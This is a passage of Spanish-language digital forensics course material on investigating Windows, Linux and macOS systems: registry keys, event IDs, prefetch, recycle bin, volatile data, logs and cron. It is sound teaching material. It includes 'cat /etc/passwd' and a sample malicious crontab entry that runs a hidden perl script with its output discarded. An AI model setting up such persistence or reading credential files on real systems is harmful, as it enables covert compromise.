Windows son:
• HKEY_CURRENT_USER: archivos NTUSER.DAT ubicados en la raíz de la
carpeta del usuario (Users\[Usuario]).
• HKEY_LOCAL_MACHINE: archivos SAM, SECURITY, SOFTWARE y SYSTEM
ubicados en %SystemRoot%\System32\Config.
• HKEY_USERS: es un puntero a los archivos NTUSER.DAT de los usuarios
que han iniciado sesión en el equipo.
• HKEY_CURRENT_CONFIG: es un puntero a HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\CurrentControlSet\Hardware Profiles.
El registro de Windows es capaz de almacenar multitud de información relevante desde

un punto de vista forense.
Ya que es prácticamente imposible conocer todo lo que de él podemos obtener, suelen
utilizarse herramientas de terceros para interpretarlo. Herramientas como: Windows
Registry Recovery, RegRipper y Registry Explorer son algunas de las más utilizadas para
realizar esta tarea.
DISPOSITIVOS USB CONECTADOS

El listado de dispositivos USB conectados al equipo es una de las cosas que podemos
obtener analizando el registro de Windows. Esta información la encontramos analizando
las claves de registro:
SYSTEM/CurrentControlSet/Enum/USBSTOR y /USB.
SYSTEM/MountedDevices.
NTUSER.DAT/Software/Microsoft/Windows/CurrentVersion/Explorer/
MountPoints2 (por cada usuario del sistema).
Además, fuera del registro de Windows también podemos encontrar esta información en
el archivo: Windows/inf/setupapi.dev.log.
Como analizar y dar sentido a todos estos artefactos puede llevarnos un tiempo, lo más

normal es utilizar herramientas que automaticen esta tarea como: USBDeview o USB
Forensic Tracker.
UNIDADES DE RED MAPEADAS Y RECURSOS COMPARTIDOS

Del análisis del registro del Sistema Operativo también podemos obtener las unidades de
red mapeadas, tan solo accediendo a la clave:
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Explorer\Map Network Drive MRU.
Además, la clave:
NTUSER.DAT/Software/Microsoft/Windows/ CurrentVersion/Explorer/MountPoints2, que
nos sirve para obtener información sobre los dispositivos USB conectados, también
registra las unidades mapeadas.
Además, también podemos obtener el listado de recursos compartidos accediendo a la
clave:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Shar es.
APLICACIONES DE INICIO
Normalmente, las aplicaciones que se inician con el sistema pueden encontrarse en
varias ubicaciones:
• Carpeta de inicio general (ProgramData\Microsoft\Windows\Start Menu\

Programs\StartUp) y del usuario (Users\[USUARIO]\AppData\ Roaming\
Microsoft\Windows\Start Menu\Programs\Startup).
• Registro de Windows general (SOFTWARE\Software\Microsoft\Windows\
CurrentVersion\Run) y de usuario (NTUSER.DAT).
• Servicios del Sistema Operativo.
Para analizar las aplicaciones que se inician con el equipo, lo más sencillo es utilizar
herramientas de terceros como WhatInStartup, de Nirsoft, Autoruns, perteneciente a las
SysInternals o scripts que automatizan esta tarea.
Otros elementos de interés dentro del Registro de Windows:
• Zona horaria
o SYSTEM\ControlSet###\Control\TimeZoneInformation.

• Último apagado
o SYSTEM\ControlSet###\Control\Windows (clave:
ShutdownTime).
• Barra de búsqueda
o NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\
Explorer\WordWheelQuery\.
• Impresoras
o SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\
Printers\.
EL REGISTRO DE EVENTOS
El registro de eventos es en realidad un conjunto de archivos especiales donde se registran
los eventos que se producen en el sistema.
En el registro de eventos podemos ver, por ejemplo, cuando un usuario inicia y cierra
sesión, cuando se cambia la hora del sistema o cuando se conecta y desconecta un
dispositivo.
A partir de Windows Vista, el registro de eventos está compuesto por un gran número de
archivos con extensión EVTX ubicados en la ruta: Windows\System32\winevt\Logs\.
De todos los archivos que componen el registro de eventos —salvo que estemos buscando
eventos de alguna herramienta en particular—, los archivos más relevantes, desde un
punto de vista forense, son:
• Application.evtx.
• Security.evtx.
• System.evtx.
Los archivos de eventos almacenan, de cada evento, al menos la siguiente información:
• Origen: programa o componente del sistema que genera el evento.

• Id. del evento: número que identifica de manera única el evento.
• Nivel del evento: informativo, advertencia, error, crítico, etc.
• Otros: usuario, fecha y hora del evento, información varia sobre el sistema y
texto asociado al evento.
Al igual que el registro de Windows, el registro de eventos es capaz de almacenar

multitud de información relevante.
Para su análisis, suelen emplearse herramientas que nos permiten automatizar algunas
tareas, realizar búsquedas y aplicar filtros. Las herramientas más comúnmente utilizadas
suelen ser: Event Log Explorer y Logparser.
Aunque también es posible utilizar herramientas tipo SIEM (Security Information and
Event Management) como ManageEngine Event Log Analyzer o LOGAlyze, entre otras.

Algunos de los eventos más típicos que podemos encontrarnos durante el análisis del
registro de eventos son:
• Inicios y cierres de sesión de los usuarios

o Archivo: Security.
o EventID: 4624 (inicio) y 4634 (cierre).
• Intentos incorrectos de login
o EventID: 4625.
• Cambios en la fecha y la hora del equipo
o EventID: 4616.
• Ejecución de programas (no todos)
o Archivo: Application.
o EventID: múltiples.
Analizando los eventos del archivo de eventos de aplicación, podemos ver registros de
aplicaciones que se han ejecutado y de aplicaciones que han provocado algún error
durante su ejecución.
Esto nos puede ayudar a ver en qué momento se ejecutaron determinadas aplicaciones
y desde qué ruta fueron ejecutadas (por ejemplo, desde un dispositivo externo o desde
una unidad de red).
ACTIVIDAD RECIENTE
Aunque utilizando Autopsy y el plugin específico podemos ver la actividad reciente del
usuario, siempre es bueno conocer de dónde podemos obtener manualmente esa
información.
En el siguiente vídeo, veremos el registro de Windows y el registro de eventos: VIDEO
Principalmente tenemos tres vías:
• Las UserAssist Keys.
• Las MRU Lists (Most Recently Used Lists).
• Archivos Prefetch.
Aunque como ya hemos visto, los eventos del sistema operativo también nos pueden dar
información muy relevante al respecto.
USERASSIST KEYS
El Sistema Operativo Windows almacena una serie de entradas en el registro

que nos permiten conocer qué programas se ejecutaron recientemente en un
sistema.

Esto puede ser extremadamente valioso durante una investigación en la que queramos
ver si se ejecutó una aplicación en particular, como una herramienta de cifrado o de
borrado.
A diferencia de los archivos prefetch, los datos de UserAssist incluyen información sobre
si una aplicación se ejecutó desde un enlace (archivo LNK) o directamente desde el
ejecutable.
Las UserAssit Keys se almacenan en el registro de cada usuario en la ruta:
NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
UserAssist\.
Dentro de esta clave veremos subclaves del tipo {F2A1CB5A-E3CC-
4A2EAF9D505A7009D442}. Cada una de estas subclaves (GUID o Id. Único universal)
representa un tipo específico (accesos directos, programas, etc.).
Dentro de cada GUID tenemos una última subclave «Count» donde encontraremos la
información del UserAssist (codificada en ROT-13) y algunos datos como el número de
veces accedida.
Por supuesto, aunque podemos interpretar las UserAssit Keys de manera manual, siempre
es más cómodo utilizar alguna herramienta como UserAssistView, de Nirsoft.
Most Recently Used List (MRU).
Las listas con las aplicaciones más recientemente accedidas las encontramos en el
registro de Windows.
Podemos encontrarnos con varios tipos de MRU Lists:
• Documentos recientes
o SFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs.
• Run MRU (herramientas ejecutadas desde Inicio, Ejecutar)
o SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
• Typed URL (URLs introducidas en la barra de direcciones)
o Software\Microsoft\Internet Explorer\TypedURLs.
Además de las anteriores, también tenemos otras listas MRU de interés:
• Rutas utilizadas para guardar docs a través de «Guardar como…»

o SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\
OpenSavePidIMRU.
• Lista de las herramientas utilizadas para abrir determinados tipos de
archivo según su extensión.
o SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts.
Como siempre, la mejor manera de analizar estas listas de últimos archivos, programas
o carpetas abiertas es utilizar herramientas que nos automaticen la extracción de la

información; y Nirsoft nos proporciona tres de ellas: RecentFilesView, LastActivityView y
OpenSaveFilesView.
ARCHIVOS PREFETCH
Cuando un archivo se ejecuta de manera repetida Windows genera un archivo prefetch
(.pf) que es algo así como un archivo pre-cargado, un archivo que agiliza la carga del
archivo original. De esta forma, el Sistema Operativo se inicia con mayor velocidad y los
programas que comúnmente utilizamos cargan más rápido.
Los archivos prefetch nacen con Windows XP, y se mantienen hasta el actual Windows.
Pero, además de estos, con Windows Vista nacen los SuperFetch, que incrementa aún
más el rendimiento ya que se crea una cache de ficheros a los que cada aplicación
accede más frecuentemente.
Para saber si un equipo tiene habilitado el prefetch, debemos acceder a la entrada
del registro: SYSTEM\ControlSet001\Control\Session Manager\Memory Management\
PrefetchParameters.
Hay tenemos la clave «EnablePrefetcher», la cual tendrá un valor entre 0 y 3, lo cual indica:
• 0: deshabilitar Prefetch.
• 1: habilitar Prefetch de inicio de aplicaciones.
• 2: habilitar Prefetch de inicio del sistema.
• 3: habilitar Prefetch de inicio de aplicaciones y de inicio del
sistema (valor por defecto).
Para saber si un equipo tiene habilitado Superfetch, en versiones anteriores de Windows

teníamos una clave llamada «EnableSuperfetch», la cual toma valores entre 0 y 3 de
igual forma que «EnablePrefetcher». Sin embargo, en las últimas versiones de Windows 10,
tenemos que irnos al servicio SysMain, y ver si se encuentra activo, o no.
Los archivos Prefetch (.pf) se almacenan en la ruta «Windows\Prefetch» y, como en
anteriores ocasiones, la mejor manera de analizarlos es utilizando scripts o herramientas
de terceros como WinPrefetchView (Nirsoft) o Prefetch Viewer (PassMark Software).
PAPELERA DE RECICLAJE
Cuando se elimina un archivo, este no se borra físicamente, sino que se envía a la papelera
de reciclaje o se marca como borrado.
Esto nos permite a los forenses recuperar archivos eliminados utilizando herramientas
específicas como FTK Imager, Encase o Winhex para recuperaciones sencillas y Recuva,
Photorec o R-Studio para recuperaciones en bruto.
Cuando un archivo se envía a la papelera de reciclaje, el archivo no está borrado, tan solo
se ha movido a una carpeta «especial» que tendremos que analizar.
La papelera de reciclaje en los Sistemas Operativos Windows modernos se encuentra en
la raíz del dispositivo dentro de la carpeta «$Recycle.Bin». En esta carpeta se encuentran

las papeleras de reciclaje de todos los usuarios que han iniciado sesión en el sistema.
Dentro de «$Recycle.Bin» tendremos una subcarpeta por cada uno de estos usuarios.
Dicha subcarpeta se denomina con el SID del usuario (ej. S-1-5-21-…-…- …-1001).
En la papelera de reciclaje de cada usuario los archivos que veremos tendrán nombres
aleatorios, del tipo 0NFFEM o 1CLQ7B. Estos nombres son completamente aleatorios, y
no representan al archivo original, lo único que se mantiene del archivo original es la
extensión.
Así, por ejemplo, si borramos el archivo «\Users\manuel\Desktop\paco.zip», en la papelera
de reciclaje veremos dos archivos:
• $I[ALEATORIO].zip.
• $R[ALEATORIO].zip.
De los dos archivos que se generan en la papelera de reciclaje (ambos con el mismo valor
aleatorio en el nombre), el archivo $R se corresponde con el archivo original eliminado
($R[ALEATORIO].zip = paco.zip) mientras que el archivo $I contiene la información del
archivo eliminado, como el nombre y la ruta originales, la fecha de eliminación y su
tamaño.
El análisis manual de los archivos de la papelera de reciclaje es relativamente sencillo.
Sin embargo, también existen herramientas que nos facilitan la labor, y una de ellas es
Rifiuti2.
Para versiones de Windows anteriores a Windows Vista, la papelera de reciclaje se
encuentra ubicado en «Recycler\{SID del usuario}», y los archivos que contienen la
metainformación (los archivos $I[ALEATORIO]) son sustituidos por un único archivo
llamado INFO2. Además, los archivos eliminados no comienzan con $R, aunque sí tienen
nombres aleatorios.
5.2. Análisis de un S.O. Linux

Linux, al igual que en Windows es mucha y muy variada por lo que nos centraremos en:
• 1. Recolección de información volátil.

• 2. Los archivos de log.
• 3. Tareas programadas y servicios.
RECOLECCIÓN DE LA INFORMACIÓN VOLÁTIL

Al igual que en los Sistemas Operativos Windows, los sistemas Linux manejan gran cantidad
de información volátil, la cual se pierde al apagar el equipo. Por lo tanto, únicamente vamos
a poder recolectar esta información si nos encontramos ante un equipo encendido.
Aunque vamos a ver distintos comandos para obtener información volátil dentro de un
sistema Linux, debemos tener en cuenta que, dada la heterogeneidad de distribuciones,

es posible que algunos de ellos no se denominen o no se ejecuten exactamente igual en
todas ellas.
Aun así, se ha intentado trabajar únicamente sobre comandos genéricos y ampliamente
disponibles.

Para obtener la fecha y hora de un sistema Linux, tan solo debemos ejecutar el comando
date.
Este comando nos devuelve la fecha y hora local del sistema o, si le pasamos parámetro
«--utc», la fecha en UTC+0.
Además, también podemos ejecutar el comando «hwclock» para leer el reloj hardware del
equipo. Ejecutando el comando «hwclock --show –utc», obtendremos la fecha en formato
UTC+0. Además, podemos utilizar la opción «--verbose» para obtener información sobre
el reloj hardware.
USUARIOS DEL EQUIPO

Para obtener el listado de usuarios de un equipo Linux, lo más sencillo es listar el contenido
del archivo «/etc/passwd». Este archivo contiene una entrada por cada uno de los usuarios
del equipo, y en él se almacenan, entre otras cosas, las credenciales de cada uno de
estos usuarios, su directorio home y la Shell (consola de comandos) que utilizan.
Para listar el contenido del archivo tan solo tenemos que ejecutar el comando: «cat /etc/
passwd».
Ilustración 69. Contenido del archivo /etc/passwd.
La estructura que sigue cada una de las entradas de este archivo es la siguiente:

Ilustración 70. Estructura de las entradas del archivo /etc/passwd.
Que en la columna password tengamos una «x» quiere decir que la contraseña está
encriptada, y que se almacena en el archivo «/etc/shadow», de acceso restringido.

Para ver los usuarios que han iniciado sesión en un equipo Linux, tenemos dos opciones,
en función de si el equipo se encuentra encendido o apagado. Si nos encontramos con
el equipo encendido y tenemos acceso a la consola, podemos utilizar el comando «last».
Por el contrario, si nos encontramos con el equipo apagado, todavía podemos obtener
la misma información analizando los archivos «/var/log/wtmp» y «/var/log/btmp»
que almacenan los históricos de inicio de sesión y los fallos en los inicios de sesión
respectivamente. El problema de estos archivos es que son logs en binario, por lo que,
aunque podemos leerlos con un simple «cat», tendremos que interpretar los resultados.
HISTORIAL DE COMANDOS EJECUTADOS

Para ver los comandos ejecutados en el terminal, tenemos también dos opciones, en
función de si el equipo se encuentra encendido o apagado.
Si nos encontramos con el equipo encendido y tenemos acceso a la consola, podemos
utilizar el comando «history».
Por el contrario, si nos encontramos con el equipo apagado, todavía podemos obtener la
misma información analizando los archivos «.bash_history» dentro de la «home» de cada
uno de los usuarios y el archivo «.bash_history» raíz, ubicado en la carpeta «/root/».

ARCHIVO.BASH_LOGOUT
El archivo «.bash_logout», ubicado en la «home» del usuario, contiene los comandos que
se ejecutarán cuando el usuario cierre la sesión abierta en el terminal.
Si nos encontramos con una máquina encendida y comprometida, este archivo puede
aportar información sobre cómo el delincuente oculta sus huellas. En la siguiente imagen
podemos observar un sencillo ejemplo:
Ilustración 71. Ejemplo del archivo.bash_logout.
ARCHIVOS ABIERTOS
Como ya hemos mencionado, conocer los archivos abiertos por los usuarios que
han iniciado sesión en el equipo puede aportar pistas muy importantes de cara a la
investigación.
En Linux, para poder ver la lista de archivos abiertos, podemos utilizar el comando «lsof»
(List Open Files). Este comando nos ayudará a encontrar todos los archivos abiertos
asociados a puertos, servicios y procesos.
• El comando «lsof» nos muestra distinta información sobre

los archivos abiertos, entre otras cosas:
• El comando asociado al proceso que ha abierto el archivo.
• El PID del proceso y el usuario que lo ha lanzado.
• El descriptor del archivo (columna FD), que nos indica si
son datos, directorios, librerías compartidas, etc.
• El nombre con la ruta completa del archivo.
• Información de red.
Cuando se está investigando un incidente, las trazas de las comunicaciones de red suelen
ser una gran fuente de información. Sobre todo, en casos relacionados con infecciones
por malware, fugas de información o incidentes de seguridad.
En estos casos, cuanta más información tengamos sobre la arquitectura de la red y sobre
las comunicaciones establecidas (y quién las ha establecido), mucho mejor.

INFORMACIÓN DE RED: INFORMACIÓN GENERAL
Antes de comenzar a obtener información sobre las conexiones establecidas, es necesario
obtener la propia configuración de los interfaces de red del equipo.
Para ello, podemos utilizar las propias herramientas del sistema, como el comando
«ifconfig» (similar a «ipconfig» en Windows), que nos muestra información sobre la
configuración de los distintos interfaces de red del equipo.
INFORMACIÓN DE RED: CONEXIONES ABIERTAS

Cuando estamos analizando un equipo que sospechamos se encuentra infectado con
un malware, uno de los primeros puntos a analizar es el de las conexiones abiertas. Las
conexiones que dicho equipo tiene establecidas con otros sistemas (ejemplo, conexiones
con el centro de control del malware o conexiones con el sistema de keylogger remoto).
Para ello podemos utilizar el comando «lsof», utilizado para listar los archivos abiertos,
pero con parámetros específicos que nos permiten obtener solo la información que nos
interesa.
• Para listar las conexiones TCP: «lsof -i TCP»

• Para listar las conexiones UDP: «lsof –i UDP»
• Para listar conexiones a la escucha: «lsof -iTCP –sTCP:LISTEN» o «lsof -iUDP –
sUDP:LISTEN»
• Para listar procesos en escuchando o transmitiendo por un determinado
puerto (ejemplo, 80): «lsof -i:80»
• Para listar procesos utilizando un determinado protocolo de
comunicaciones o servicio (ejemplo, http): «lsof –i:http».
Los procesos que se encuentran en ejecución y la manera en que estos han sido «lanzados»
es también importante de cara a una investigación.
Analizando los procesos en ejecución podemos saber, por ejemplo, si se están utilizando
los recursos de la empresa para minar criptomonedas o si algún equipo está infectado
con un software malicioso.
Como hemos comentado antes, la manera más sencilla de ver los procesos en ejecución
es a través de los comandos que nos proporciona el propio Sistema Operativos como
«ps» o «pstree» y el comando «top», que nos permite ver el estado actual de la máquina,
sus procesos y los usuarios que los han lanzado.

PROCESOS EN EJECUCIÓN: PS Y PSTREE
Los comandos del sistema «ps» y «pstree» nos muestran el listado de procesos en
ejecución. La diferencia es que «pstree» nos muestra la información en forma de árbol, lo
que nos permite ver quién ha lanzado qué proceso.
Otra pequeña diferencia es que «pstree» muestra los hilos asociados a cada proceso de
manera predeterminada, mientras que para ver los hilos de ejecución de cada proceso
con el comando «ps» debemos ejecutar «ps –eLf», ya que, si no, parecerá que ambos
comandos dan información diferente.
El comando «ps» tiene múltiples parámetros para visualizar los procesos en ejecución,
aunque la manera más utilizada de ejecutarlo es «ps aux».
a: eliminar la restricción BSD «only yourself» para agregar procesos de otros usuarios.
u: utilizar el formato orientado al usuario.
x: eliminar la restricción BSD «must have a tty» para agregar procesos que no tengan una
tty (terminal) asociada.
PROCESOS EN EJECUCIÓN: KILL

Si nos encontramos en un equipo de respuesta a incidentes o estamos actuando como
tal en nuestra organización, es posible que debamos «matar» algún proceso malicioso
que detectemos.
Quizás un malware que está cifrando la información, quizás una herramienta de minado
de criptomonedas, en ocasiones, vamos a necesitar finalizar procesos que no deberían
estar funcionando y, para eso, utilizaremos el comando «kill».
Podemos matar procesos simplemente con «kill [PID]» (ejemplo, «kill 1709» para matar el
proceso con PID = 1709), lo que enviará al proceso una señal del tipo SIGTERM (finalizar
proceso).
Es posible que esto no siempre ocurra (incluso, es probable que no nos interese enviar
esa señal a un malware), por lo que podemos especificar qué señal enviar al proceso
para su finalización, es la más normal SIGKILL (código 9), la cual fuerza la finalización del
proceso independientemente de su estado (ejemplo, «kill -9 1709» o «kill –SIGKILL 1709»).
Podemos ver el listado de señales que podemos enviar a los procesos con el comando
«kill –l».

El directorio «/proc» de un sistema Linux es un directorio especial. No existe realmente
(solo podemos adquirirlo en caliente), pero contiene información muy relevante.
Este directorio especial contiene todos los detalles de un sistema Linux, incluyendo su
kernel, los procesos en ejecución y los parámetros de configuración del sistema.

Ilustración 72, Contenido de la carpeta /proc.
Si quisiéramos adquirir la información del proceso con PID 6, tan solo tendríamos que
acceder a la carpeta «/proc/6/» donde encontraríamos una serie de subcarpetas y
archivos con distinta información sobre el proceso.
Algunos de los archivos de interés que podemos encontrar son:
• cmdline: comando ejecutado y sus parámetros.

• cwd: enlace simbólico al directorio del trabajo del proceso.
• environ: variables de entorno del proceso.
• fd: contiene los descriptores de archive del proceso.
Podemos ver qué archivos o dispositivos está utilizando.
• maps, statm, y mem: espacio de memoria en uso por el
proceso.
• stat and status: nos proporciona información sobre el
estado del proceso.
Un archivo que suele ser interesante dentro del directorio «/proc» es el archivo «/proc/
cmdline», el cual nos muestra los parámetros pasados al kernel durante el arranque
(ejemplo, Malware ejecutándose en el arranque).
Por su parte, en «/proc/mounts», también podemos encontrar información interesante,
ya que nos muestra todos los puntos de montaje en uso. Como es un directorio bastante
complejo y lleno de información de interés, la recomendación es que siempre que
os encontréis una máquina Linux encendida le echéis un vistazo y adquiráis toda la
información que pudiera ser de interés.
ÚLTIMOS ARCHIVOS MODIFICADOS

Analizando las fechas de modificación, acceso y creación de los archivos, podemos
intentar reproducir las acciones realizadas por los atacantes en un sistema. Para ello
podemos utilizar el comando «find». Este comando nos permite especificar qué queremos
buscar exactamente (archivos, carpetas, etc.) así como la información que queremos
obtener.

Gracias al comando «find» podemos crear una línea temporal de las acciones que se han
ido realizando sobre un sistema. Eso sí, debemos tener en cuenta que todas las fechas
son susceptibles de ser alteradas, por lo que tenemos que prestar especial atención a
cualquier incoherencia que podamos encontrar.
Para obtener el listado de los últimos archivos modificados tan solo debemos ejecutar el
comando:
• find. -type f -user root -perm +111 –printf \

%TY%Tm%Td%TH%TM%TS %h/%f\n| sort –nr
• -type f Archivo.
• -user root Usuario (podemos no indicarlo).
• perm +111 Permisos (ejecutable por cualquiera).
• printf … Qué queremos ver (fecha y datos del archivo).
• | sort –nr Ordenamos por fecha de más reciente a
menos (realmente se ordena de manera numérica
descendientemente).
ÚLTIMOS ARCHIVOS CREADOS

Por supuesto, también podemos utilizar el comando «find» para obtener la lista de los
archivos creados recientemente. Para ello, ejecutaremos el mismo comando que para
listar los archivos modificados, pero indicando que la fecha que queremos obtener es la
de creación:
• find. -type f -perm +111 -printf %CY%Cm%Cd%CH%CM%CS \

%h/ %f\n | sort -nr | head -30.
El parámetro «| head -30» es para limitar el número de archivos a mostrar.
ARCHIVOS DE LOG
Los archivos de log de Linux (al igual que en cualquier otro SO) almacenan información
sobre las actividades realizadas en el sistema. Los podríamos asimilar a los archivos de
eventos que vimos para sistemas Windows.
La mayoría de los registros de Linux se almacenan en la ruta «/var/log/», y suelen ser

archivos de texto plano.
Aunque hay muchos y variados archivos de log, en esta sesión nos vamos a centrar en
aquellos que tienen mayor interés desde un punto de vista forense.

Cuando trabajamos con archivos de log, es recomendable tener una idea de qué es
lo que buscamos, ya que, aunque es posible una revisión en profundidad de todos los
archivos de log, la cantidad de tiempo y recursos que invertiríamos harían inviable la
pericial.
Es por ello por lo que en los análisis forenses es recomendable centrarse en:
• /var/log/auth.log (o /var/log/secure).
• /var/log/daemon.log.
• /var/log/syslog (o /var/log/messages).
• Otros archivos de log específicos de algunas
aplicaciones que fueran de interés (ej. Mysql,
apache, etc.).
• /var/log/auth.log (o /var/log/secure).
El archivo de log «auth.log» contiene los eventos de autenticación y de inicios y cierres de

sesión (incluidos los cron o demonios). Registra todo lo relacionado con los procedimientos
que implican la autorización del usuario.
El análisis del archivo «auth.log» puede aportarnos información sobre intentos de inicio
de sesión fallidos, ataques por fuerza bruta o intentos de explotación de vulnerabilidades
relacionadas con el mecanismo de autorización.
/var/log/daemon.log
Registra los eventos generados por los demonios en segundo plano. Por lo general, los
procesos y/o servicios en segundo plano mantienen logs de gran valor relacionados con
las actividades de un usuario.
También debemos tener en cuenta que algunos programas (por ejemplo, MySQL)
registran los logs de sus servicios en segundo plano en archivos específicos.
/var/log/syslog (o /var/log/messages)
Contiene mensajes generales del sistema. Se utiliza, principalmente, para registrar
información y mensajes no críticos lanzados por el sistema.
Podemos obtener información sobre errores durante el inicio del sistema o errores
relacionados con las aplicaciones, por lo que suele ser un buen punto de partida cuando
algo no funciona correctamente.
En este archivo podemos ver también los parámetros con los que se ejecutan determinados
demonios.

OTROS ARCHIVOS DE LOG
Como ya hemos mencionado, muchas aplicaciones almacenan información en sus
propios archivos de log (ejemplo, Mysql, apache, etc). Estos otros archivos de log pueden
ser de interés si estamos realizando un análisis forense sobre algo relacionado con ellos.
Por ejemplo, real: el servidor web de una consultoría fue hackeado, y robaron cientos
de credenciales y datos de clientes. En este caso hubo que analizar los logs de apache
(habían aprovechado una vulnerabilidad), httpd y mysql para obtener toda la información
sobre lo que los atacantes habían podido hacer en el sistema.
TAREAS PROGRAMADAS Y SERVICIOS

Para programar tareas en sistemas Linux, solemos utilizar «cron». Esta herramienta permite
a los usuarios de Linux ejecutar automáticamente comandos o scripts a una hora o fecha
específicas.
Se utiliza normalmente para tareas administrativas, pero puede ser usado para ejecutar
cualquier cosa, como malware persistente.
Hay, al menos, dos maneras distintas de utilizar cron para programar tareas:
Utilizando «crontab».
Añadiendo el script al directorio «/etc/cron.[PERIODICIDAD]».
TAREAS PROGRAMADAS: CRONTAB
Una de las maneras más comunes para programar tareas es utilizar «crontab». Mediante
«crontab» podemos configurar un «cron» e indicar el momento en que ejecuta, el
comando o script y el usuario que lo ejecutará (debe tener privilegios).
Por un lado, los ficheros crontab —en los que podemos ver los «cro» configurados
para cada usuario— se guardan en: /var/spool/cron/crontabs/[USUARIO].
También podemos encontrar archivos crontab en el directorio «/etc/cron.d».
Por otro lado, tenemos también un archivo crontab general que podemos
encontrar en: «/etc/crontab». Este crontab general es el que «lanza» los scripts
ubicados en los directorios del tipo «/etc/cron.[PERIODICIDAD]» que veremos
más adelante.

Ilustración 73. Estructura de los archivos crontad.
Los archivos «crontab» tienen la siguiente estructura: Analizando un archivo «crontab»

podemos ver algo así:
10 * * * * perl /var/tmp/xxcrFWrZMH >/dev/null 2>&1.
Como vemos, el cron anterior se ejecuta todas las horas a los 10 minutos, y lanza un script
en perl de nombre sospechoso (xxcrFWrZMH). Probablemente, un malware.
La salida del script la redirige a /dev/null para que no quede registrada en ningún sitio.
Tareas programadas: /etc/cron.[PERIODICIDAD]
La segunda manera de usar «cron» consiste en añadir el script a alguno de los directorios
del tipo «cron.[PERIODICIDAD]» ubicados en «/etc/». Estos directorios suelen ser: cron.hourly,
cron.daily, cron.weekly y cron.monthly.
Cualquier script que copiemos en los directorios indicados se ejecutará con la periodicidad
de dicho directorio (cada hora, cada día, cada semana o cada mes en el ejemplo anterior).
Los scripts de estos directorios comienzan por «#!/bin/sh», lo que indica que se trata de
un script Shell de bash. El resto del contenido es el código del propio script.
5.3. Análisis de un S.O. MacOS

MacOS, aunque en algunos casos sea similar a la que podemos encontrar en sistemas
Linux, tiene una serie de peculiaridades que es necesario conocer.
SIMILITUDES CON SISTEMAS LINUX

Aunque Linux y MacOS no son «parientes» directos, sí que comparten una gran parte de su
estructura y manera de funcionar. Por ejemplo, en MacOS tenemos los directorios «/etc»,
«/var» y «/home» al igual que en Linux. Sin embargo, su contenido no siempre coincide.

La manera en que se asignan permisos a los archivos y usuarios también es similar
en Linux y MacOS, y veremos que muchos de los comandos que vimos para Sistemas
Operativos Linux funcionan para sistemas MacOS.
RECOLECCIÓN DE INFORMACIÓN VOLÁTIL

Como ya vimos para Windows y Linux, los sistemas MacOS también manejan gran cantidad
de información volátil, la cual se pierde al apagar el equipo. Por lo tanto, únicamente vamos
a poder recolectar esta información si nos encontramos ante un equipo encendido.
Aunque vamos a ver distintos comandos para obtener información volátil dentro de un
sistema MacOS, debemos tener en cuenta que, futuras actualizaciones y/o configuraciones
de los sistemas pueden hacer que algunos comandos no se ejecuten exactamente igual
en todas ellas.
Aun así, se ha intentado trabajar solo sobre comandos genéricos y ampliamente
disponibles.

Para obtener la fecha y hora de un sistema Linux, tan solo debemos ejecutar el comando
«date». Este comando nos devuelve la fecha y hora local del sistema o, si le pasamos el
parámetro «-u», la fecha en UTC+0.
USUARIOS DEL EQUIPO

Para obtener el listado de usuarios de un equipo MacOS, lo más sencillo es listar el
contenido del archivo «/etc/passwd». Tal y como haríamos en un Sistema Linux.
Este archivo contiene una entrada por cada uno de los usuarios del equipo y en él
se almacenan, entre otras cosas, las credenciales de cada uno de estos usuarios, su
directorio home y la Shell (consola de comandos) que utilizan.
Para listar el contenido del archivo, tan solo tenemos que ejecutar el comando: «cat /etc/
passwd».
El contenido de este archivo tiene la misma estructura que en un Sistema Operativo
Linux. Sin embargo, al contrario que Linux, en los Sistemas Operativos MacOS, cuando la
contraseña de los usuarios está cifrada, no se almacena en «/etc/shadow».
En MacOS hay un archivo «shadow» por cada usuario, y se encuentran en la ruta «/var/
db/dslocal/nodes/Default/users/» en archivos.Plist. Estos archivos contienen información
sobre la contraseña y su creación en un archivo de tipo diccionario.

Para ver los usuarios que han iniciado sesión en un equipo Linux, tenemos dos opciones,

en función de si el equipo se encuentra encendido o apagado. Si nos encontramos con
el equipo encendido, y tenemos acceso a la consola, podemos utilizar el comando «last».
Por el contrario, si nos encontramos con el equipo apagado todavía podemos obtener la
misma información analizando el archivo «/var/run/utmpx» que almacena el histórico de
inicios de sesión.
El problema de este archivo (como también ocurría en Linux) es que es un log en binario,
por lo que, aunque podemos leerlos con un simple «cat», tendremos que interpretar los
resultados.
HISTORIAL DE COMANDOS EJECUTADOS

Para ver los comandos ejecutados en el terminal también tenemos dos opciones (al
igual que en Linux): Si nos encontramos con el equipo encendido y tenemos acceso a la
consola, podemos utilizar el comando «history»
Por el contrario, si nos encontramos con el equipo apagado, todavía podemos obtener
la misma información analizando los archivos «.bash_history» (o «.zsh_history», según
el terminal que tenga configurado el usuario) dentro de la “ home de cada uno de los
usuarios.
Debemos tener en cuenta que podemos encontrar información de este tipo en varios
archivos «.[TERMINAL]_history». Por ejemplo, un usuario puede haber ejecutado unos
comandos en un terminal «bash», los cuales se encontrarán registrados en «.bash_history»
y otros distintos en un terminal «zsh», los cuales podremos ver en el archivo «.zsh_history».
ARCHIVOS ABIERTOS
Como ya hemos mencionado, conocer los archivos abiertos por los usuarios que
han iniciado sesión en el equipo puede aportar pistas muy importantes de cara a la
investigación.
En MacOS (como también podemos hacer en Linux), para poder ver la lista de archivos
abiertos podemos utilizar el comando «lsof» (List Open Files).
Este comando nos ayudará a encontrar todos los archivos abiertos asociados a puertos,
servicios y procesos.
Recordemos que la manera más sencilla de ver los procesos en ejecución es a través de
los comandos que nos proporciona el propio Sistema Operativo como «ps» o el comando
«top».

El comando top nos permite ver el estado actual de la máquina, sus procesos y los
usuarios que los han lanzado. Por su parte, el comando «ps» nos muestra el listado de
procesos en ejecución. Este comando «ps» tiene múltiples parámetros para visualizar los
procesos en ejecución, aunque la manera más utilizada de ejecutarlo es «ps aux».
